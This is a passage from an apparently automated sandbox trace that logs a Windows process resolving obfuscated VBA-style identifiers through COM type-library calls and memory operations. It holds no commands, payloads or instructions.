pBstrLibName=0x144c50) returned 0x0 [0068.476] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.476] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.476] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="l4_AAAZ", lHashVal=0x102bba, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.476] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2872, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="l4_AAAZ") returned 8 [0068.476] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="l4_AAAZ", lHashVal=0x102bba, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.476] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.476] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba2872 | out: _Dst=0x67c2d60) returned 0x0 [0068.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_l4_AAAZ") returned 0x102f3e [0068.476] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_l4_AAAZ" | out: _Dst="_B_var_l4_AAAZ") returned 0x0 [0068.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_l4_AAAZ") returned 15 [0068.476] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.476] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_l4_AAAZ", lHashVal=0x102f3e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.476] IUnknown:Release (This=0x665ba50) returned 0xb [0068.476] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.476] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_l4_AAAZ", lHashVal=0x102f3e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.476] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.476] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.476] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_l4_AAAZ", lHashVal=0x102f3e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.476] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.476] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.477] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_l4_AAAZ", lHashVal=0x102f3e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.477] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.477] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.477] IUnknown:Release (This=0x665ba50) returned 0xb [0068.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1cca, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_l4_AAAZ") returned 15 [0068.477] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_l4_AAAZ", lHashVal=0x102f3e, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.477] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2872 | out: _Dst=0x145020) returned 0x0 [0068.477] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iAAADAA4", lHashVal=0x10cb9c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba289a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="iAAADAA4") returned 9 [0068.477] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iAAADAA4", lHashVal=0x10cb9c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba289a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="iAAADAA4") returned 9 [0068.477] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iAAADAA4", lHashVal=0x10cb9c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.477] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAADAA4") returned 0x10cb9c [0068.477] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="iAAADAA4" | out: _Dst="iAAADAA4") returned 0x0 [0068.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="iAAADAA4") returned 9 [0068.477] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.477] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iAAADAA4", lHashVal=0x10cb9c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.477] IUnknown:Release (This=0x665ba50) returned 0xb [0068.477] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.477] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iAAADAA4", lHashVal=0x10cb9c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.478] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.478] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.478] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iAAADAA4", lHashVal=0x10cb9c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.478] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.478] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.478] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iAAADAA4", lHashVal=0x10cb9c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.478] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba289a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="iAAADAA4") returned 9 [0068.478] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iAAADAA4", lHashVal=0x10cb9c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.478] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.478] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba289a | out: _Dst=0x67c2d60) returned 0x0 [0068.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iAAADAA4") returned 0x10a325 [0068.478] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_iAAADAA4" | out: _Dst="_B_var_iAAADAA4") returned 0x0 [0068.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_iAAADAA4") returned 16 [0068.478] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.478] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iAAADAA4", lHashVal=0x10a325, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.478] IUnknown:Release (This=0x665ba50) returned 0xb [0068.478] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.478] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iAAADAA4", lHashVal=0x10a325, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.478] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.478] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.478] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iAAADAA4", lHashVal=0x10a325, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.478] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.478] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.478] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iAAADAA4", lHashVal=0x10a325, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.478] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.479] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.479] IUnknown:Release (This=0x665ba50) returned 0xb [0068.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1cfa, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_iAAADAA4") returned 16 [0068.479] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iAAADAA4", lHashVal=0x10a325, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x69005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x69005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0068.479] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba289a | out: _Dst=0x145020) returned 0x0 [0068.479] GetLocalTime (in: lpSystemTime=0x144b58 | out: lpSystemTime=0x144b58*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0x296)) [0068.479] _ultow_s (in: _Value=0x5e95ca91, _Buffer=0xaf2bb34, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e95ca91") returned 0x0 [0068.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="085e95ca91", cchWideChar=11, lpMultiByteStr=0x144ab0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="085e95ca91", lpUsedDefaultChar=0x0) returned 11 [0068.479] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58e60, cb=0x20) returned 0x682e5e0 [0068.479] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58f30, cb=0x28) returned 0x682e880 [0068.479] strcpy_s (in: _Dst=0xafb5cb8, _DstSize=0x7, _Src="IZDBQ4" | out: _Dst="IZDBQ4") returned 0x0 [0068.479] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.479] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.479] GetCurrentProcess () returned 0xffffffffffffffff [0068.479] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.479] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.479] strcpy_s (in: _Dst=0xafb6138, _DstSize=0x8, _Src="SAAAAGQ" | out: _Dst="SAAAAGQ") returned 0x0 [0068.480] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.480] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.480] GetCurrentProcess () returned 0xffffffffffffffff [0068.480] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.480] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.480] strcpy_s (in: _Dst=0xafb6148, _DstSize=0x7, _Src="MAUAAD" | out: _Dst="MAUAAD") returned 0x0 [0068.480] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafb6880 [0068.480] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.480] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.480] GetCurrentProcess () returned 0xffffffffffffffff [0068.480] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.480] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.480] strcpy_s (in: _Dst=0xafb6158, _DstSize=0x7, _Src="FZUAGA" | out: _Dst="FZUAGA") returned 0x0 [0068.480] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.480] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.480] GetCurrentProcess () returned 0xffffffffffffffff [0068.480] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.480] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.480] strcpy_s (in: _Dst=0xafb6af8, _DstSize=0x7, _Src="XwAk1D" | out: _Dst="XwAk1D") returned 0x0 [0068.480] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.480] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.480] GetCurrentProcess () returned 0xffffffffffffffff [0068.480] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.480] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.480] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafb6d20 [0068.481] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a64790, cb=0x100) returned 0xaf543a0 [0068.481] strcpy_s (in: _Dst=0xafb6b08, _DstSize=0x9, _Src="YQcxcoBw" | out: _Dst="YQcxcoBw") returned 0x0 [0068.481] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.481] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.481] GetCurrentProcess () returned 0xffffffffffffffff [0068.481] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.481] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.481] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x10) returned 0x67c2d60 [0068.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba28c6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="jC_QwoA") returned 8 [0068.482] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jC_QwoA", lHashVal=0x10cd9a, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba28c6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="jC_QwoA") returned 8 [0068.482] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jC_QwoA", lHashVal=0x10cd9a, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba28c6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="jC_QwoA") returned 8 [0068.482] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jC_QwoA", lHashVal=0x10cd9a, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jC_QwoA") returned 0x10cd9a [0068.482] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="jC_QwoA" | out: _Dst="jC_QwoA") returned 0x0 [0068.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="jC_QwoA") returned 8 [0068.482] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.482] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jC_QwoA", lHashVal=0x10cd9a, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.482] IUnknown:Release (This=0x665ba50) returned 0xb [0068.482] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.483] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jC_QwoA", lHashVal=0x10cd9a, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.483] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.483] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.483] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jC_QwoA", lHashVal=0x10cd9a, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.483] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.483] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.483] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jC_QwoA", lHashVal=0x10cd9a, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.483] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba28c6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="jC_QwoA") returned 8 [0068.483] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jC_QwoA", lHashVal=0x10cd9a, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.483] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.483] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba28c6 | out: _Dst=0x67c2d40) returned 0x0 [0068.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jC_QwoA") returned 0x10d11e [0068.483] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_jC_QwoA" | out: _Dst="_B_var_jC_QwoA") returned 0x0 [0068.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_jC_QwoA") returned 15 [0068.483] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.483] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jC_QwoA", lHashVal=0x10d11e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.483] IUnknown:Release (This=0x665ba50) returned 0xb [0068.483] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.484] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jC_QwoA", lHashVal=0x10d11e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.484] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.484] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.484] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jC_QwoA", lHashVal=0x10d11e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.484] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.484] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.484] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jC_QwoA", lHashVal=0x10d11e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.484] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.484] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.484] IUnknown:Release (This=0x665ba50) returned 0xb [0068.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1d2a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_jC_QwoA") returned 15 [0068.484] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jC_QwoA", lHashVal=0x10d11e, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x6a005f00720061, ppTypeComp=0x77005100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x6a005f00720061, ppTypeComp=0x77005100000000, pDummy=0x0) returned 0x0 [0068.484] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba28c6 | out: _Dst=0x145020) returned 0x0 [0068.484] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zoA1AZ", lHashVal=0x103300, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba28ee, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zoA1AZ") returned 7 [0068.485] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zoA1AZ", lHashVal=0x103300, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba28ee, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zoA1AZ") returned 7 [0068.485] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zoA1AZ", lHashVal=0x103300, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.485] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zoA1AZ") returned 0x103300 [0068.485] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="zoA1AZ" | out: _Dst="zoA1AZ") returned 0x0 [0068.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="zoA1AZ") returned 7 [0068.485] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.485] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zoA1AZ", lHashVal=0x103300, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.485] IUnknown:Release (This=0x665ba50) returned 0xb [0068.485] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.485] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zoA1AZ", lHashVal=0x103300, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.485] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.485] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.485] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zoA1AZ", lHashVal=0x103300, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.485] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.485] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.485] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zoA1AZ", lHashVal=0x103300, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.485] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba28ee, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zoA1AZ") returned 7 [0068.485] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zoA1AZ", lHashVal=0x103300, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, 